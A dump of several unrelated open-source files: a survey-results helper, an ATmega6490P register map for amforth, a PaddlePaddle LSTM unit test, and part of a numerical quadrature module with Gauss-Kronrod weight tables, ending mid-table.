if question.type == 'multiple_choice':
result.append({'key': str(question.question),
'values': survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)})
if question.type == 'simple_choice':
result = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
if question.type == 'matrix':
data = survey_obj.prepare_result(request.cr, request.uid, question, current_filters, context=request.context)
for answer in data['answers']:
values = []
for res in data['result']:
if res[1] == answer:
values.append({'text': data['rows'][res[0]], 'count': data['result'][res]})
result.append({'key': data['answers'].get(answer), 'values': values})
return json.dumps(result)
def dict_soft_update(dictionary, key, value):
''' Insert the pair <key>: <value> into the <dictionary>. If <key> is
already present, this function will append <value> to the list of
existing data (instead of erasing it) '''
if key in dictionary:
dictionary[key].append(value)
else:
dictionary.update({key: [value]})
| agpl-3.0 |
andrewtholt/My-amforth-6.1 | avr8/devices/atmega6490p/device.py | 5 | 6779 | # Partname: ATmega6490P
# generated automatically, do not edit
MCUREGS = {
'ADMUX': '&124',
'ADMUX_REFS': '$C0',
'ADMUX_ADLAR': '$20',
'ADMUX_MUX': '$1F',
'ADCSRA': '&122',
'ADCSRA_ADEN': '$80',
'ADCSRA_ADSC': '$40',
'ADCSRA_ADATE': '$20',
'ADCSRA_ADIF': '$10',
'ADCSRA_ADIE': '$08',
'ADCSRA_ADPS': '$07',
'ADC': '&120',
'ADCSRB': '&123',
'ADCSRB_ADTS': '$07',
'DIDR0': '&126',
'DIDR0_ADC7D': '$80',
'DIDR0_ADC6D': '$40',
'DIDR0_ADC5D': '$20',
'DIDR0_ADC4D': '$10',
'DIDR0_ADC3D': '$08',
'DIDR0_ADC2D': '$04',
'DIDR0_ADC1D': '$02',
'DIDR0_ADC0D': '$01',
'ACSR': '&80',
'ACSR_ACD': '$80',
'ACSR_ACBG': '$40',
'ACSR_ACO': '$20',
'ACSR_ACI': '$10',
'ACSR_ACIE': '$08',
'ACSR_ACIC': '$04',
'ACSR_ACIS': '$03',
'DIDR1': '&127',
'DIDR1_AIN1D': '$02',
'DIDR1_AIN0D': '$01',
'SPCR': '&76',
'SPCR_SPIE': '$80',
'SPCR_SPE': '$40',
'SPCR_DORD': '$20',
'SPCR_MSTR': '$10',
'SPCR_CPOL': '$08',
'SPCR_CPHA': '$04',
'SPCR_SPR': '$03',
'SPSR': '&77',
'SPSR_SPIF': '$80',
'SPSR_WCOL': '$40',
'SPSR_SPI2X': '$01',
'SPDR': '&78',
'USIDR': '&186',
'USISR': '&185',
'USISR_USISIF': '$80',
'USISR_USIOIF': '$40',
'USISR_USIPF': '$20',
'USISR_USIDC': '$10',
'USISR_USICNT': '$0F',
'USICR': '&184',
'USICR_USISIE': '$80',
'USICR_USIOIE': '$40',
'USICR_USIWM': '$30',
'USICR_USICS': '$0C',
'USICR_USICLK': '$02',
'USICR_USITC': '$01',
'UDR0': '&198',
'UCSR0A': '&192',
'UCSR0A_RXC0': '$80',
'UCSR0A_TXC0': '$40',
'UCSR0A_UDRE0': '$20',
'UCSR0A_FE0': '$10',
'UCSR0A_DOR0': '$08',
'UCSR0A_UPE0': '$04',
'UCSR0A_U2X0': '$02',
'UCSR0A_MPCM0': '$01',
'UCSR0B': '&193',
'UCSR0B_RXCIE0': '$80',
'UCSR0B_TXCIE0': '$40',
'UCSR0B_UDRIE0': '$20',
'UCSR0B_RXEN0': '$10',
'UCSR0B_TXEN0': '$08',
'UCSR0B_UCSZ02': '$04',
'UCSR0B_RXB80': '$02',
'UCSR0B_TXB80': '$01',
'UCSR0C': '&194',
'UCSR0C_UMSEL0': '$40',
'UCSR0C_UPM0': '$30',
'UCSR0C_USBS0': '$08',
'UCSR0C_UCSZ0': '$06',
'UCSR0C_UCPOL0': '$01',
'UBRR0': '&196',
'SREG': '&95',
'SREG_I': '$80',
'SREG_T': '$40',
'SREG_H': '$20',
'SREG_S': '$10',
'SREG_V': '$08',
'SREG_N': '$04',
'SREG_Z': '$02',
'SREG_C': '$01',
'SP': '&93',
'MCUCR': '&85',
'MCUCR_PUD': '$10',
'MCUCR_IVSEL': '$02',
'MCUCR_IVCE': '$01',
'MCUSR': '&84',
'MCUSR_JTRF': '$10',
'MCUSR_WDRF': '$08',
'MCUSR_BORF': '$04',
'MCUSR_EXTRF': '$02',
'MCUSR_PORF': '$01',
'OSCCAL': '&102',
'CLKPR': '&97',
'CLKPR_CLKPCE': '$80',
'CLKPR_CLKPS': '$0F',
'PRR': '&100',
'PRR_PRLCD': '$10',
'PRR_PRTIM1': '$08',
'PRR_PRSPI': '$04',
'PRR_PRUSART0': '$02',
'PRR_PRADC': '$01',
'SMCR': '&83',
'SMCR_SM': '$0E',
'SMCR_SE': '$01',
'GPIOR2': '&75',
'GPIOR1': '&74',
'GPIOR0': '&62',
'OCDR': '&81',
'EEAR': '&65',
'EEDR': '&64',
'EECR': '&63',
'EECR_EERIE': '$08',
'EECR_EEMWE': '$04',
'EECR_EEWE': '$02',
'EECR_EERE': '$01',
'PORTA': '&34',
'DDRA': '&33',
'PINA': '&32',
'PORTB': '&37',
'DDRB': '&36',
'PINB': '&35',
'PORTC': '&40',
'DDRC': '&39',
'PINC': '&38',
'PORTD': '&43',
'DDRD': '&42',
'PIND': '&41',
'PORTE': '&46',
'DDRE': '&45',
'PINE': '&44',
'PORTF': '&49',
'DDRF': '&48',
'PINF': '&47',
'PORTG': '&52',
'DDRG': '&51',
'PING': '&50',
'TCCR0A': '&68',
'TCCR0A_FOC0A': '$80',
'TCCR0A_WGM00': '$40',
'TCCR0A_COM0A': '$30',
'TCCR0A_WGM01': '$08',
'TCCR0A_CS0': '$07',
'TCNT0': '&70',
'OCR0A': '&71',
'TIMSK0': '&110',
'TIMSK0_OCIE0A': '$02',
'TIMSK0_TOIE0': '$01',
'TIFR0': '&53',
'TIFR0_OCF0A': '$02',
'TIFR0_TOV0': '$01',
'GTCCR': '&67',
'GTCCR_TSM': '$80',
'GTCCR_PSR310': '$01',
'TCCR1A': '&128',
'TCCR1A_COM1A': '$C0',
'TCCR1A_COM1B': '$30',
'TCCR1A_WGM1': '$03',
'TCCR1B': '&129',
'TCCR1B_ICNC1': '$80',
'TCCR1B_ICES1': '$40',
'TCCR1B_WGM1': '$18',
'TCCR1B_CS1': '$07',
'TCCR1C': '&130',
'TCCR1C_FOC1A': '$80',
'TCCR1C_FOC1B': '$40',
'TCNT1': '&132',
'OCR1A': '&136',
'OCR1B': '&138',
'ICR1': '&134',
'TIMSK1': '&111',
'TIMSK1_ICIE1': '$20',
'TIMSK1_OCIE1B': '$04',
'TIMSK1_OCIE1A': '$02',
'TIMSK1_TOIE1': '$01',
'TIFR1': '&54',
'TIFR1_ICF1': '$20',
'TIFR1_OCF1B': '$04',
'TIFR1_OCF1A': '$02',
'TIFR1_TOV1': '$01',
'TCCR2A': '&176',
'TCCR2A_FOC2A': '$80',
'TCCR2A_WGM20': '$40',
'TCCR2A_COM2A': '$30',
'TCCR2A_WGM21': '$08',
'TCCR2A_CS2': '$07',
'TCNT2': '&178',
'OCR2A': '&179',
'TIMSK2': '&112',
'TIMSK2_OCIE2A': '$02',
'TIMSK2_TOIE2': '$01',
'TIFR2': '&55',
'TIFR2_OCF2A': '$02',
'TIFR2_TOV2': '$01',
'ASSR': '&182',
'ASSR_EXCLK': '$10',
'ASSR_AS2': '$08',
'ASSR_TCN2UB': '$04',
'ASSR_OCR2UB': '$02',
'ASSR_TCR2UB': '$01',
'WDTCR': '&96',
'WDTCR_WDCE': '$10',
'WDTCR_WDE': '$08',
'WDTCR_WDP': '$07',
'SPMCSR': '&87',
'SPMCSR_SPMIE': '$80',
'SPMCSR_RWWSB': '$40',
'SPMCSR_RWWSRE': '$10',
'SPMCSR_BLBSET': '$08',
'SPMCSR_PGWRT': '$04',
'SPMCSR_PGERS': '$02',
'SPMCSR_SPMEN': '$01',
'PORTH': '&218',
'DDRH': '&217',
'PINH': '&216',
'PORTJ': '&221',
'DDRJ': '&220',
'PINJ': '&219',
'LCDDR19': '&255',
'LCDDR18': '&254',
'LCDDR17': '&253',
'LCDDR16': '&252',
'LCDDR15': '&251',
'LCDDR14': '&250',
'LCDDR13': '&249',
'LCDDR12': '&248',
'LCDDR11': '&247',
'LCDDR10': '&246',
'LCDDR9': '&245',
'LCDDR8': '&244',
'LCDDR7': '&243',
'LCDDR6': '&242',
'LCDDR5': '&241',
'LCDDR4': '&240',
'LCDDR3': '&239',
'LCDDR2': '&238',
'LCDDR1': '&237',
'LCDDR0': '&236',
'LCDCCR': '&231',
'LCDFRR': '&230',
'LCDFRR_LCDPS': '$70',
'LCDFRR_LCDCD': '$07',
'LCDCRB': '&229',
'LCDCRB_LCDCS': '$80',
'LCDCRB_LCD2B': '$40',
'LCDCRB_LCDMUX': '$30',
'LCDCRB_LCDPM': '$0F',
'LCDCRA': '&228',
'LCDCRA_LCDEN': '$80',
'LCDCRA_LCDAB': '$40',
'LCDCRA_LCDIF': '$10',
'LCDCRA_LCDIE': '$08',
'LCDCRA_LCDBL': '$01',
'EICRA': '&105',
'EICRA_ISC01': '$02',
'EICRA_ISC00': '$01',
'EIMSK': '&61',
'EIMSK_PCIE': '$F0',
'EIMSK_INT0': '$01',
'EIFR': '&60',
'EIFR_PCIF': '$F0',
'EIFR_INTF0': '$01',
'PCMSK3': '&115',
'PCMSK2': '&109',
'PCMSK1': '&108',
'PCMSK0': '&107',
'INT0Addr': '2',
'PCINT0Addr': '4',
'PCINT1Addr': '6',
'TIMER2_COMPAddr': '8',
'TIMER2_OVFAddr': '10',
'TIMER1_CAPTAddr': '12',
'TIMER1_COMPAAddr': '14',
'TIMER1_COMPBAddr': '16',
'TIMER1_OVFAddr': '18',
'TIMER0_COMPAddr': '20',
'TIMER0_OVFAddr': '22',
'SPI__STCAddr': '24',
'USART__RXAddr': '26',
'USART__UDREAddr': '28',
'USART0__TXAddr': '30',
'USI_STARTAddr': '32',
'USI_OVERFLOWAddr': '34',
'ANALOG_COMPAddr': '36',
'ADCAddr': '38',
'EE_READYAddr': '40',
'SPM_READYAddr': '42',
'LCDAddr': '44',
'PCINT2Addr': '46',
'PCINT3Addr': '48'
} | gpl-3.0 |
baidu/Paddle | python/paddle/fluid/tests/unittests/test_ir_memory_optimize_nlp.py | 5 | 1878 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# nlp model stack of op operate on lod. It's a classical test case in optimize pass.
from __future__ import print_function
import paddle.fluid as fluid
import unittest
from ir_memory_optimize_net_base import TestIrMemOptBase
def lstm_net(data,
label,
dict_dim,
emb_dim=128,
hid_dim=128,
hid_dim2=96,
class_dim=2,
emb_lr=30.0):
emb = fluid.layers.embedding(
input=data,
size=[dict_dim, emb_dim],
param_attr=fluid.ParamAttr(learning_rate=emb_lr))
fc0 = fluid.layers.fc(input=emb, size=hid_dim * 4)
lstm_h, c = fluid.layers.dynamic_lstm(
input=fc0, size=hid_dim * 4, is_reverse=False)
lstm_max = fluid.layers.sequence_pool(input=lstm_h, pool_type='max')
lstm_max_tanh = fluid.layers.tanh(lstm_max)
fc1 = fluid.layers.fc(input=lstm_max_tanh, size=hid_dim2, act='tanh')
prediction = fluid.layers.fc(input=fc1, size=class_dim, act='softmax')
cost = fluid.layers.cross_entropy(input=prediction, label=label)
avg_cost = fluid.layers.mean(x=cost)
return avg_cost
class TestIrMemOptRNN(TestIrMemOptBase):
def setUp(self):
self.network = lstm_net
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
rtrwalker/geotecha | geotecha/mathematics/quadrature.py | 1 | 74253 | # geotecha - A software suite for geotechncial engineering
# Copyright (C) 2018 Rohan T. Walker ([email protected])
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/gpl.html.
"""Numerical integration by quadrature"""
from __future__ import division, print_function
import matplotlib.pyplot
import numpy as np
from scipy import integrate
from scipy.special import jn_zeros
from scipy.special import jn
from matplotlib import pyplot as plt
import functools
import unittest
from numpy.testing import assert_allclose
from numpy.polynomial.polynomial import Polynomial
def gauss_kronrod_abscissae_and_weights(n):
"""Gauss-Kronrod quadrature abscissae and weights
Coarse integral = Sum(f(xi) * wi1)
Fine integral = Sum(f(xi) * wi2)
For the coarse integral the unused weights are set to zero
Parameters
----------
n : [2-20, 32, 64, 100]
number of integration points for the Gauss points. Number of Kronrod
points will automatically be 2 * n + 1.
Returns
-------
xi : 1d array
Abscissae for the quadrature points.
wi1 : 1d array
Weights for the coarse integral.
wi2 : 1d array
Weights for the fine integral
References
----------
.. [2] Holoborodko, Pavel. 2011. 'Gauss-Kronrod Quadrature Nodes and
Weights. November 7.
http://www.advanpix.com/2011/11/07/gauss-kronrod-quadrature-nodes-weights/#Tabulated_Gauss-Kronrod_weights_and_abscissae
"""
if n not in [7,10,15,20,25,30]:
raise ValueError('n must be 2-20, 32, 64, or 100')
weights = {
7: {
'g': np.array(
[[-0.9491079123427585245261897, 0.1294849661688696932706114],
[ -0.7415311855993944398638648, 0.2797053914892766679014678],
[ -0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.0000000000000000000000000, 0.4179591836734693877551020],
[ 0.4058451513773971669066064, 0.3818300505051189449503698],
[ 0.7415311855993944398638648, 0.2797053914892766679014678],
[ 0.9491079123427585245261897, 0.1294849661688696932706114]],
dtype=float),
'k': np.array(
[[-0.9914553711208126392068547, 0.0229353220105292249637320],
[ -0.9491079123427585245261897, 0.0630920926299785532907007],
[ -0.8648644233597690727897128, 0.1047900103222501838398763],
[ -0.7415311855993944398638648, 0.1406532597155259187451896],
[ -0.5860872354676911302941448, 0.1690047266392679028265834],
[ -0.4058451513773971669066064, 0.1903505780647854099132564],
[ -0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.0000000000000000000000000, 0.2094821410847278280129992],
[ 0.2077849550078984676006894, 0.2044329400752988924141620],
[ 0.4058451513773971669066064, 0.1903505780647854099132564],
[ 0.5860872354676911302941448, 0.1690047266392679028265834],
[ 0.7415311855993944398638648, 0.1406532597155259187451896],
[ 0.8648644233597690727897128, 0.1047900103222501838398763],
[ 0.9491079123427585245261897, 0.0630920926299785532907007],
[ 0.9914553711208126392068547, 0.0229353220105292249637320]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
10: {
'g': np.array(
[[-0.9739065285171717200779640, 0.0666713443086881375935688],
[ -0.8650633666889845107320967, 0.1494513491505805931457763],
[ -0.6794095682990244062343274, 0.2190863625159820439955349],
[ -0.4333953941292471907992659, 0.2692667193099963550912269],
[ -0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.1488743389816312108848260, 0.2955242247147528701738930],
[ 0.4333953941292471907992659, 0.2692667193099963550912269],
[ 0.6794095682990244062343274, 0.2190863625159820439955349],
[ 0.8650633666889845107320967, 0.1494513491505805931457763],
[ 0.9739065285171717200779640, 0.0666713443086881375935688]],
dtype=float),
'k': np.array(
[[-0.9956571630258080807355273, 0.0116946388673718742780644],
[ -0.9739065285171717200779640, 0.0325581623079647274788190],
[ -0.9301574913557082260012072, 0.0547558965743519960313813],
[ -0.8650633666889845107320967, 0.0750396748109199527670431],
[ -0.7808177265864168970637176, 0.0931254545836976055350655],
[ -0.6794095682990244062343274, 0.1093871588022976418992106],
[ -0.5627571346686046833390001, 0.1234919762620658510779581],
[ -0.4333953941292471907992659, 0.1347092173114733259280540],
[ -0.2943928627014601981311266, 0.1427759385770600807970943],
[ -0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.0000000000000000000000000, 0.1494455540029169056649365],
[ 0.1488743389816312108848260, 0.1477391049013384913748415],
[ 0.2943928627014601981311266, 0.1427759385770600807970943],
[ 0.4333953941292471907992659, 0.1347092173114733259280540],
[ 0.5627571346686046833390001, 0.1234919762620658510779581],
[ 0.6794095682990244062343274, 0.1093871588022976418992106],
[ 0.7808177265864168970637176, 0.0931254545836976055350655],
[ 0.8650633666889845107320967, 0.0750396748109199527670431],
[ 0.9301574913557082260012072, 0.0547558965743519960313813],
[ 0.9739065285171717200779640, 0.0325581623079647274788190],
[ 0.9956571630258080807355273, 0.0116946388673718742780644]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False], dtype=bool)
},
15: {
'g': np.array(
[[-0.9879925180204854284895657, 0.0307532419961172683546284],
[ -0.9372733924007059043077589, 0.0703660474881081247092674],
[ -0.8482065834104272162006483, 0.1071592204671719350118695],
[ -0.7244177313601700474161861, 0.1395706779261543144478048],
[ -0.5709721726085388475372267, 0.1662692058169939335532009],
[ -0.3941513470775633698972074, 0.1861610000155622110268006],
[ -0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.0000000000000000000000000, 0.2025782419255612728806202],
[ 0.2011940939974345223006283, 0.1984314853271115764561183],
[ 0.3941513470775633698972074, 0.1861610000155622110268006],
[ 0.5709721726085388475372267, 0.1662692058169939335532009],
[ 0.7244177313601700474161861, 0.1395706779261543144478048],
[ 0.8482065834104272162006483, 0.1071592204671719350118695],
[ 0.9372733924007059043077589, 0.0703660474881081247092674],
[ 0.9879925180204854284895657, 0.0307532419961172683546284]],
dtype=float),
'k': np.array(
[[-0.9980022986933970602851728, 0.0053774798729233489877921],
[ -0.9879925180204854284895657, 0.0150079473293161225383748],
[ -0.9677390756791391342573480, 0.0254608473267153201868740],
[ -0.9372733924007059043077589, 0.0353463607913758462220379],
[ -0.8972645323440819008825097, 0.0445897513247648766082273],
[ -0.8482065834104272162006483, 0.0534815246909280872653431],
[ -0.7904185014424659329676493, 0.0620095678006706402851392],
[ -0.7244177313601700474161861, 0.0698541213187282587095201],
[ -0.6509967412974169705337359, 0.0768496807577203788944328],
[ -0.5709721726085388475372267, 0.0830805028231330210382892],
[ -0.4850818636402396806936557, 0.0885644430562117706472754],
[ -0.3941513470775633698972074, 0.0931265981708253212254869],
[ -0.2991800071531688121667800, 0.0966427269836236785051799],
[ -0.2011940939974345223006283, 0.0991735987217919593323932],
[ -0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.0000000000000000000000000, 0.1013300070147915490173748],
[ 0.1011420669187174990270742, 0.1007698455238755950449467],
[ 0.2011940939974345223006283, 0.0991735987217919593323932],
[ 0.2991800071531688121667800, 0.0966427269836236785051799],
[ 0.3941513470775633698972074, 0.0931265981708253212254869],
[ 0.4850818636402396806936557, 0.0885644430562117706472754],
[ 0.5709721726085388475372267, 0.0830805028231330210382892],
[ 0.6509967412974169705337359, 0.0768496807577203788944328],
[ 0.7244177313601700474161861, 0.0698541213187282587095201],
[ 0.7904185014424659329676493, 0.0620095678006706402851392],
[ 0.8482065834104272162006483, 0.0534815246909280872653431],
[ 0.8972645323440819008825097, 0.0445897513247648766082273],
[ 0.9372733924007059043077589, 0.0353463607913758462220379],
[ 0.9677390756791391342573480, 0.0254608473267153201868740],
[ 0.9879925180204854284895657, 0.0150079473293161225383748],
[ 0.9980022986933970602851728, 0.0053774798729233489877921]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False], dtype=bool)
},
20: {
'g': np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
'k': np.array(
[[-0.9988590315882776638383156, 0.0030735837185205315012183],
[ -0.9931285991850949247861224, 0.0086002698556429421986618],
[ -0.9815078774502502591933430, 0.0146261692569712529837880],
[ -0.9639719272779137912676661, 0.0203883734612665235980102],
[ -0.9408226338317547535199827, 0.0258821336049511588345051],
[ -0.9122344282513259058677524, 0.0312873067770327989585431],
[ -0.8782768112522819760774430, 0.0366001697582007980305572],
[ -0.8391169718222188233945291, 0.0416688733279736862637883],
[ -0.7950414288375511983506388, 0.0464348218674976747202319],
[ -0.7463319064601507926143051, 0.0509445739237286919327077],
[ -0.6932376563347513848054907, 0.0551951053482859947448324],
[ -0.6360536807265150254528367, 0.0591114008806395723749672],
[ -0.5751404468197103153429460, 0.0626532375547811680258701],
[ -0.5108670019508270980043641, 0.0658345971336184221115636],
[ -0.4435931752387251031999922, 0.0686486729285216193456234],
[ -0.3737060887154195606725482, 0.0710544235534440683057904],
[ -0.3016278681149130043205554, 0.0730306903327866674951894],
[ -0.2277858511416450780804962, 0.0745828754004991889865814],
[ -0.1526054652409226755052202, 0.0757044976845566746595428],
[ -0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.0000000000000000000000000, 0.0766007119179996564450499],
[ 0.0765265211334973337546404, 0.0763778676720807367055028],
[ 0.1526054652409226755052202, 0.0757044976845566746595428],
[ 0.2277858511416450780804962, 0.0745828754004991889865814],
[ 0.3016278681149130043205554, 0.0730306903327866674951894],
[ 0.3737060887154195606725482, 0.0710544235534440683057904],
[ 0.4435931752387251031999922, 0.0686486729285216193456234],
[ 0.5108670019508270980043641, 0.0658345971336184221115636],
[ 0.5751404468197103153429460, 0.0626532375547811680258701],
[ 0.6360536807265150254528367, 0.0591114008806395723749672],
[ 0.6932376563347513848054907, 0.0551951053482859947448324],
[ 0.7463319064601507926143051, 0.0509445739237286919327077],
[ 0.7950414288375511983506388, 0.0464348218674976747202319],
[ 0.8391169718222188233945291, 0.0416688733279736862637883],
[ 0.8782768112522819760774430, 0.0366001697582007980305572],
[ 0.9122344282513259058677524, 0.0312873067770327989585431],
[ 0.9408226338317547535199827, 0.0258821336049511588345051],
[ 0.9639719272779137912676661, 0.0203883734612665235980102],
[ 0.9815078774502502591933430, 0.0146261692569712529837880],
[ 0.9931285991850949247861224, 0.0086002698556429421986618],
[ 0.9988590315882776638383156, 0.0030735837185205315012183]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False], dtype=bool)
},
25: {
'g': np.array(
[[-0.9955569697904980979087849, 0.0113937985010262879479030],
[ -0.9766639214595175114983154, 0.0263549866150321372619018],
[ -0.9429745712289743394140112, 0.0409391567013063126556235],
[ -0.8949919978782753688510420, 0.0549046959758351919259369],
[ -0.8334426287608340014210211, 0.0680383338123569172071872],
[ -0.7592592630373576305772829, 0.0801407003350010180132350],
[ -0.6735663684734683644851206, 0.0910282619829636498114972],
[ -0.5776629302412229677236898, 0.1005359490670506442022069],
[ -0.4730027314457149605221821, 0.1085196244742636531160940],
[ -0.3611723058093878377358217, 0.1148582591457116483393255],
[ -0.2438668837209884320451904, 0.1194557635357847722281781],
[ -0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.0000000000000000000000000, 0.1231760537267154512039029],
[ 0.1228646926107103963873598, 0.1222424429903100416889595],
[ 0.2438668837209884320451904, 0.1194557635357847722281781],
[ 0.3611723058093878377358217, 0.1148582591457116483393255],
[ 0.4730027314457149605221821, 0.1085196244742636531160940],
[ 0.5776629302412229677236898, 0.1005359490670506442022069],
[ 0.6735663684734683644851206, 0.0910282619829636498114972],
[ 0.7592592630373576305772829, 0.0801407003350010180132350],
[ 0.8334426287608340014210211, 0.0680383338123569172071872],
[ 0.8949919978782753688510420, 0.0549046959758351919259369],
[ 0.9429745712289743394140112, 0.0409391567013063126556235],
[ 0.9766639214595175114983154, 0.0263549866150321372619018],
[ 0.9955569697904980979087849, 0.0113937985010262879479030]],
dtype=float),
'k': np.array(
[[-0.9992621049926098341934575, 0.0019873838923303159265079],
[ -0.9955569697904980979087849, 0.0055619321353567137580402],
[ -0.9880357945340772476373310, 0.0094739733861741516072077],
[ -0.9766639214595175114983154, 0.0132362291955716748136564],
[ -0.9616149864258425124181300, 0.0168478177091282982315167],
[ -0.9429745712289743394140112, 0.0204353711458828354565683],
[ -0.9207471152817015617463461, 0.0240099456069532162200925],
[ -0.8949919978782753688510420, 0.0274753175878517378029485],
[ -0.8658470652932755954489970, 0.0307923001673874888911090],
[ -0.8334426287608340014210211, 0.0340021302743293378367488],
[ -0.7978737979985000594104109, 0.0371162714834155435603306],
[ -0.7592592630373576305772829, 0.0400838255040323820748393],
[ -0.7177664068130843881866541, 0.0428728450201700494768958],
[ -0.6735663684734683644851206, 0.0455029130499217889098706],
[ -0.6268100990103174127881227, 0.0479825371388367139063923],
[ -0.5776629302412229677236898, 0.0502776790807156719633253],
[ -0.5263252843347191825996238, 0.0523628858064074758643667],
[ -0.4730027314457149605221821, 0.0542511298885454901445434],
[ -0.4178853821930377488518144, 0.0559508112204123173082407],
[ -0.3611723058093878377358217, 0.0574371163615678328535827],
[ -0.3030895389311078301674789, 0.0586896800223942079619742],
[ -0.2438668837209884320451904, 0.0597203403241740599790993],
[ -0.1837189394210488920159699, 0.0605394553760458629453603],
[ -0.1228646926107103963873598, 0.0611285097170530483058590],
[ -0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.0000000000000000000000000, 0.0615808180678329350787598],
[ 0.0615444830056850788865464, 0.0614711898714253166615441],
[ 0.1228646926107103963873598, 0.0611285097170530483058590],
[ 0.1837189394210488920159699, 0.0605394553760458629453603],
[ 0.2438668837209884320451904, 0.0597203403241740599790993],
[ 0.3030895389311078301674789, 0.0586896800223942079619742],
[ 0.3611723058093878377358217, 0.0574371163615678328535827],
[ 0.4178853821930377488518144, 0.0559508112204123173082407],
[ 0.4730027314457149605221821, 0.0542511298885454901445434],
[ 0.5263252843347191825996238, 0.0523628858064074758643667],
[ 0.5776629302412229677236898, 0.0502776790807156719633253],
[ 0.6268100990103174127881227, 0.0479825371388367139063923],
[ 0.6735663684734683644851206, 0.0455029130499217889098706],
[ 0.7177664068130843881866541, 0.0428728450201700494768958],
[ 0.7592592630373576305772829, 0.0400838255040323820748393],
[ 0.7978737979985000594104109, 0.0371162714834155435603306],
[ 0.8334426287608340014210211, 0.0340021302743293378367488],
[ 0.8658470652932755954489970, 0.0307923001673874888911090],
[ 0.8949919978782753688510420, 0.0274753175878517378029485],
[ 0.9207471152817015617463461, 0.0240099456069532162200925],
[ 0.9429745712289743394140112, 0.0204353711458828354565683],
[ 0.9616149864258425124181300, 0.0168478177091282982315167],
[ 0.9766639214595175114983154, 0.0132362291955716748136564],
[ 0.9880357945340772476373310, 0.0094739733861741516072077],
[ 0.9955569697904980979087849, 0.0055619321353567137580402],
[ 0.9992621049926098341934575, 0.0019873838923303159265079]],
dtype=float),
'dup': np.array(
[False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False, True, False, True,
False, True, False, True, False, True, False, True, False,
True, False, True, False, True, False], dtype=bool)
},
30: {
'g': np.array(
[[-0.9968934840746495402716301, 0.0079681924961666056154659],
[ -0.9836681232797472099700326, 0.0184664683110909591423021],
[ -0.9600218649683075122168710, 0.0287847078833233693497192],
[ -0.9262000474292743258793243, 0.0387991925696270495968019],
[ -0.8825605357920526815431165, 0.0484026728305940529029381],
[ -0.8295657623827683974428981, 0.0574931562176190664817217],
[ -0.7677774321048261949179773, 0.0659742298821804951281285],
[ -0.6978504947933157969322924, 0.0737559747377052062682439],
[ -0.6205261829892428611404776, 0.0807558952294202153546949],
[ -0.5366241481420198992641698, 0.0868997872010829798023875],
[ -0.4470337695380891767806099, 0.0921225222377861287176327],
[ -0.3527047255308781134710372, 0.0963687371746442596394686],
[ -0.2546369261678898464398051, 0.0995934205867952670627803],
[ -0.1538699136085835469637947, 0.1017623897484055045964290],
[ -0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.0514718425553176958330252, 0.1028526528935588403412856],
[ 0.1538699136085835469637947, 0.1017623897484055045964290],
[ 0.2546369261678898464398051, 0.0995934205867952670627803],
[ 0.3527047255308781134710372, 0.0963687371746442596394686],
[ 0.4470337695380891767806099, 0.0921225222377861287176327],
[ 0.5366241481420198992641698, 0.0868997872010829798023875],
[ 0.6205261829892428611404776, 0.0807558952294202153546949],
[ 0.6978504947933157969322924, 0.0737559747377052062682439],
[ 0.7677774321048261949179773, 0.0659742298821804951281285],
